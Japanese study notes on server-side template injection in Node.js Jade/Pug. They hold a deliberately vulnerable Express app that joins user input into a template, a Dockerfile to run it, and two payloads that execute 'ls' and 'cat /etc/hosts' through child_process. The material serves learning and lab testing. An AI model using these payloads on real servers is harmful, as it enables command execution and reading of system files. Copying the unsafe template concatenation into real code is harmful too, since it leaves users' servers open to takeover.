サーバーサイドテンプレートインジェクション

脆弱なソースコード　（nodejs jade/Pug?)

const express = require('express')
var bodyParser = require('body-parser');
const app = express()
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));

var jade = require('jade');
const port = 5064

function getHTML(input){
    var template =`
doctype
html
head
    title= 'Hello world'
body
    form(action='/' method='post')
        label(for='name') Name:
            input#name.form-control(type='text', placeholder='' name='name')
        button.btn.btn-primary(type='submit') Submit
    p Hello `+input

    var fn = jade.compile(template);
    var html = fn({name:'Oleg'});
    console.log(input)
    console.log(html);
    return html;
}
app.post('/', (request, response) => {
    var input = request.param('name', "")
    var html = getHTML(input)
    response.send(html);
})
app.get('/', (request, response) => {
    var html = getHTML("")
    response.send(html)
})
app.listen(port, (err) => {
if (err) {
    return console.log('something bad happened', err)
}

console.log(`server is listening on ${port}`)
})

• Dockerfile

FROM node:6
COPY src/ /home
RUN npm install
RUN npm install jade
RUN npm install express

https://github.com/DiogoMRSilva/websitesVulnerableToSSTI/blob/master/javascript/jade/

攻撃する方法

#{%s}

どちらでもよさげ

RCE

#{global.process.mainModule.require('child_process').execSync('ls').toString() }

#{global.process.mainModule.require('child_process').execSync('cat /etc/hosts')}

参考